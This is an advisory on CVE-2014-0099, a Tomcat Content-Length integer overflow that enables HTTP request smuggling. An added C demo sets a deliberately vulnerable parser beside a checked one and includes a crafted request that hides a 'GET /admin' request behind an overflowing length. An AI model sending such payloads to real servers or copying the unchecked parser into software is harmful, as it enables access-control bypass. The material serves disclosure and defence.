PT-2014-1445 · Apache · Apache Tomcat
Published 2014-03-27 · Updated 2022-05-14
CVE-2014-0099
CVSS v2.0: 4.3 (Medium)
| Vector | AV:N/AC:M/Au:N/C:N/I:P/A:N |
Name of the Vulnerable Software and Affected Versions
Apache Tomcat versions prior to 6.0.40
Apache Tomcat versions 7.x prior to 7.0.53
Apache Tomcat versions 8.x prior to 8.0.4
Description
The vulnerability is an integer overflow in Tomcat's Ascii.java, in the code that parses the Content-Length request header: the decimal digits are accumulated into a 64-bit long without checking whether the result overflowed, so a sufficiently large value silently wraps to a small or negative number. When Tomcat is operated behind a reverse proxy, the proxy and Tomcat can therefore disagree about how long a request body is, and a remote attacker can exploit that disagreement with a crafted Content-Length header to conduct HTTP request smuggling attacks.
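The following is an added example, not Tomcat's source and not part of the original advisory. It shows the vulnerable parsing pattern beside a checked one, and how the wrapped length lets a second request hide inside the body of the first. Java's long wraps silently on overflow; the example models that wrap with uint64_t arithmetic, which is well-defined in C. The function names, the -1 "rejected" convention and the CRAFTED request buffer are all assumptions made for the illustration.

```c
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* Vulnerable pattern (illustrative, not Tomcat's source): decimal digits are
 * accumulated into a 64-bit value with no overflow check. Java's long wraps
 * silently; that wrap is modelled here with uint64_t arithmetic and the result
 * is reinterpreted as signed, as a Java caller would see it.
 * Returns -1 for an empty or non-numeric value (assumed convention). */
int64_t parse_content_length_vuln(const char *s, size_t len) {
    if (len == 0) return -1;
    uint64_t n = 0;
    for (size_t i = 0; i < len; i++) {
        if (s[i] < '0' || s[i] > '9') return -1;
        n = n * 10 + (uint64_t)(s[i] - '0');   /* wraps modulo 2^64 */
    }
    return (int64_t)n;                          /* two's-complement view */
}

/* Hardened pattern: refuse the value as soon as the next digit would push the
 * accumulator past INT64_MAX, so no wrap can ever happen. Returns -1 on
 * rejection (assumed convention: a negative length is never valid). */
int64_t parse_content_length_safe(const char *s, size_t len) {
    if (len == 0) return -1;
    int64_t n = 0;
    for (size_t i = 0; i < len; i++) {
        if (s[i] < '0' || s[i] > '9') return -1;
        int64_t d = s[i] - '0';
        if (n > (INT64_MAX - d) / 10) return -1;  /* n * 10 + d would overflow */
        n = n * 10 + d;
    }
    return n;
}

/* Constructed request (not from the advisory). The declared length is
 * 2^64 + 5: a parser that checks for overflow rejects it, while the wrapping
 * parser sees 5, treats "AAAAA" as the whole body, and reads the bytes that
 * follow as a second request, which is the desync request smuggling relies on. */
static const char CRAFTED[] =
    "POST /app HTTP/1.1\r\n"
    "Host: backend\r\n"
    "Content-Length: 18446744073709551621\r\n"
    "\r\n"
    "AAAAA"
    "GET /admin HTTP/1.1\r\nHost: backend\r\n\r\n";

/* Offset at which a server using `parse` would start the next request, or -1
 * when the Content-Length is rejected or the body is not yet complete. */
long next_request_offset(const char *req, size_t len,
                         int64_t (*parse)(const char *, size_t)) {
    static const char hdr[] = "Content-Length: ";
    const char *p = strstr(req, hdr);
    const char *blank = strstr(req, "\r\n\r\n");
    if (p == NULL || blank == NULL) return -1;
    p += sizeof(hdr) - 1;
    const char *eol = strstr(p, "\r\n");
    if (eol == NULL) return -1;
    int64_t cl = parse(p, (size_t)(eol - p));
    if (cl < 0) return -1;                          /* rejected: no desync */
    size_t body_start = (size_t)(blank - req) + 4;
    if ((uint64_t)cl > len - body_start) return -1; /* body incomplete */
    return (long)(body_start + (size_t)cl);
}

int main(void) {
    size_t len = sizeof(CRAFTED) - 1;
    long v = next_request_offset(CRAFTED, len, parse_content_length_vuln);
    long s = next_request_offset(CRAFTED, len, parse_content_length_safe);
    printf("wrapping parser: next request starts at offset %ld -> %.10s\n",
           v, v >= 0 ? CRAFTED + v : "(none)");
    printf("checked parser:  %ld (request rejected)\n", s);
    return 0;
}
```

The point to take from the run is that the wrapping parser positions the next request at the start of the embedded "GET /admin" line, while the checked parser never reaches the body at all: a front-end that rejects the header and a back-end that wraps it are exactly the mismatch the advisory describes.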
Recommendations
For Apache Tomcat versions prior to 6.0.40, update to version 6.0.40 or later.
For Apache Tomcat versions 7.x prior to 7.0.53, update to version 7.0.53 or later.
For Apache Tomcat versions 8.x prior to 8.0.4, update to version 8.0.4 or later.
As a temporary workaround until the update can be applied, have the reverse proxy in front of Tomcat reject requests whose Content-Length header is not a well-formed, non-negative decimal value within the range the proxy itself accepts, so that a value large enough to overflow Tomcat's parser never reaches it.
Related identifiers
Affected products
Apache Tomcat
CentOS
HP-UX
Red Hat
SUSE
Ubuntu